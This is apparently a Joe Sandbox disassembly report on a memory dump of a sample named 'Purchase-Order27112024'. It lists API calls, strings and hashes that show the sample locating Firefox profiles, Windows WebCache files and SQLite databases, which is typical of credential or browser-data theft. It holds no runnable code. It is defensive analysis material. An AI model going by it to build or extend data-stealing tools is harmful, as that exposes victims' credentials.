                                                                                                      • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                                                                                                      APIs
                                                                                                      • memcpy.MSVCRT(00000048,00451D40,0000002C,000003FF,00445FAE,?,00000000,?,0040B879), ref: 004444E3
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpy
                                                                                                      • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                                                                      • API String ID: 3510742995-2641926074
                                                                                                      • Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                                                      • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                                                                                      • Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                                                      • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                                                                                      APIs
                                                                                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                      • String ID:
                                                                                                      • API String ID: 2941347001-0
                                                                                                      • Opcode ID: 80e482451f5ca37e8404f50e4d067f365766b265f7642500ec0655012d68ebd6
                                                                                                      • Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
                                                                                                      • Opcode Fuzzy Hash: 80e482451f5ca37e8404f50e4d067f365766b265f7642500ec0655012d68ebd6
                                                                                                      • Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 00403C09
                                                                                                      • memset.MSVCRT ref: 00403C1E
                                                                                                        • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                        • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                                                                                        • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                                                                                      • wcscat.MSVCRT ref: 00403C47
                                                                                                        • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                        • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                        • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                      • wcscat.MSVCRT ref: 00403C70
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memsetwcscat$CloseFolderPathSpecialwcscpywcslen
                                                                                                      • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                                                                      • API String ID: 1534475566-1174173950
                                                                                                      • Opcode ID: 8452d1ff202b3ecdc32f03c4689b339ff6508c8f38893fabe83067ed25a4ac21
                                                                                                      • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                                                                                                      • Opcode Fuzzy Hash: 8452d1ff202b3ecdc32f03c4689b339ff6508c8f38893fabe83067ed25a4ac21
                                                                                                      • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                                                                                                      APIs
                                                                                                        • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                                                      • SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                      • memset.MSVCRT ref: 00414C87
                                                                                                      • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                      • wcscpy.MSVCRT ref: 00414CFC
                                                                                                        • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                                                                                      Strings
                                                                                                      • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressCloseFolderPathProcSpecialVersionmemsetwcscpy
                                                                                                      • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                      • API String ID: 71295984-2036018995
                                                                                                      • Opcode ID: f400cfab40eb781a7377af97b809c3f02e1ff83a00fe342fd0a4f0569afe9d8a
                                                                                                      • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                                                                                                      • Opcode Fuzzy Hash: f400cfab40eb781a7377af97b809c3f02e1ff83a00fe342fd0a4f0569afe9d8a
                                                                                                      • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                                                                                                      APIs
                                                                                                      • wcschr.MSVCRT ref: 00414458
                                                                                                      • _snwprintf.MSVCRT ref: 0041447D
                                                                                                      • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                                                                      • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                                                      • String ID: "%s"
                                                                                                      • API String ID: 1343145685-3297466227
                                                                                                      • Opcode ID: aabbe202c5f79078aea71dac5ab2605718744c8b92afc7520f4e067a7367162e
                                                                                                      • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                                                                                      • Opcode Fuzzy Hash: aabbe202c5f79078aea71dac5ab2605718744c8b92afc7520f4e067a7367162e
                                                                                                      • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                                                                                      APIs
                                                                                                      • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                                                                                                      • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressHandleModuleProcProcessTimes
                                                                                                      • String ID: GetProcessTimes$kernel32.dll
                                                                                                      • API String ID: 1714573020-3385500049
                                                                                                      • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                                      • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                                                                                      • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                                      • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 004087D6
                                                                                                        • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                        • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                                                                                      • memset.MSVCRT ref: 00408828
                                                                                                      • memset.MSVCRT ref: 00408840
                                                                                                      • memset.MSVCRT ref: 00408858
                                                                                                      • memset.MSVCRT ref: 00408870
                                                                                                      • memset.MSVCRT ref: 00408888
                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                                                                                      • String ID:
                                                                                                      • API String ID: 2911713577-0
                                                                                                      • Opcode ID: 6684bba834465d20886231ffe2d62564197a18c1a2325da43f028315e65dbcab
                                                                                                      • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                                                                                                      • Opcode Fuzzy Hash: 6684bba834465d20886231ffe2d62564197a18c1a2325da43f028315e65dbcab
                                                                                                      • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                                                                                                      APIs
                                                                                                      • memcmp.MSVCRT(?,?,00000004,?,00000065,004381DF,00000065,00000000,00000007,?,00000000), ref: 0041F202
                                                                                                      • memcmp.MSVCRT(?,SQLite format 3,00000010,?,00000065,004381DF,00000065,00000000), ref: 0041F22D
                                                                                                      • memcmp.MSVCRT(?,@ ,00000003,?,?,00000065,004381DF,00000065,00000000), ref: 0041F299
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcmp
                                                                                                      • String ID: @ $SQLite format 3
                                                                                                      • API String ID: 1475443563-3708268960
                                                                                                      • Opcode ID: bc797f5c287fbec082bfe36368e8bdb92b626008a1b8340b8f00afaa449410d4
                                                                                                      • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                                                                                      • Opcode Fuzzy Hash: bc797f5c287fbec082bfe36368e8bdb92b626008a1b8340b8f00afaa449410d4
                                                                                                      • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _wcsicmpqsort
                                                                                                      • String ID: /nosort$/sort
                                                                                                      • API String ID: 1579243037-1578091866
                                                                                                      • Opcode ID: a0f12cb90dd745c164ef67684cb79943b88980d13b6e843c418957b63f9314a7
                                                                                                      • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                                                                                      • Opcode Fuzzy Hash: a0f12cb90dd745c164ef67684cb79943b88980d13b6e843c418957b63f9314a7
                                                                                                      • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 0040E60F
                                                                                                      • memset.MSVCRT ref: 0040E629
                                                                                                        • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                      Strings
                                                                                                      • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                                                                      • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memsetwcslen$AttributesFileFolderPathSpecialwcscatwcscpy
                                                                                                      • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                                                                      • API String ID: 2887208581-2114579845
                                                                                                      • Opcode ID: 45b77cc57d7adabb6b76daf53bfb3be083a41c4971f5e6ab387fbe8a56a2d209
                                                                                                      • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                                                                                                      • Opcode Fuzzy Hash: 45b77cc57d7adabb6b76daf53bfb3be083a41c4971f5e6ab387fbe8a56a2d209
                                                                                                      • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                                                                                                      APIs
                                                                                                      • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                                                                                                      • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                                                                                      • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                                                                                      • LockResource.KERNEL32(00000000), ref: 004148EF
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Resource$FindLoadLockSizeof
                                                                                                      • String ID:
                                                                                                      • API String ID: 3473537107-0
                                                                                                      • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                                      • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                                                                                                      • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                                      • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                                                                                                      APIs
                                                                                                      • ??3@YAXPAX@Z.MSVCRT(02130048), ref: 0044DF01
                                                                                                      • ??3@YAXPAX@Z.MSVCRT(02140050), ref: 0044DF11
                                                                                                      • ??3@YAXPAX@Z.MSVCRT(00616EA0), ref: 0044DF21
                                                                                                      • ??3@YAXPAX@Z.MSVCRT(02140458), ref: 0044DF31
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ??3@
                                                                                                      • String ID:
                                                                                                      • API String ID: 613200358-0
                                                                                                      • Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                                      • Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
                                                                                                      • Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                                      • Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset
                                                                                                      • String ID: only a single result allowed for a SELECT that is part of an expression
                                                                                                      • API String ID: 2221118986-1725073988
                                                                                                      • Opcode ID: d115b1de85cb0c2c74241db9f2e26d4ca9f76d3b3ab36ed3aa85b1754c3cbe0d
                                                                                                      • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                                                                                      • Opcode Fuzzy Hash: d115b1de85cb0c2c74241db9f2e26d4ca9f76d3b3ab36ed3aa85b1754c3cbe0d
                                                                                                      • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                                                                                      APIs
                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,00000000,00412966,/deleteregkey,/savelangfile,?,?,?,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004125C3
                                                                                                      • DeleteObject.GDI32(00000000), ref: 004125E7
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ??3@DeleteObject
                                                                                                      • String ID: r!A
                                                                                                      • API String ID: 1103273653-628097481
                                                                                                      • Opcode ID: 35011d0761a793af9b86058f165b74ada9e8dfd6de6a99c5cda2ffee1e56a26e
                                                                                                      • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                                                                                                      • Opcode Fuzzy Hash: 35011d0761a793af9b86058f165b74ada9e8dfd6de6a99c5cda2ffee1e56a26e
                                                                                                      • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                                                                                                      APIs
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0CC
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0EA
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D108
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D126
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ??2@
                                                                                                      • String ID:
                                                                                                      • API String ID: 1033339047-0
                                                                                                      • Opcode ID: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                                                                      • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                                                                                      • Opcode Fuzzy Hash: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                                                                      • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                                                                                                      APIs
                                                                                                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                                      • memcmp.MSVCRT(?,0044EC68,00000010,?,00000000,?), ref: 00444BA5
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc$memcmp
                                                                                                      • String ID: $$8
                                                                                                      • API String ID: 2808797137-435121686
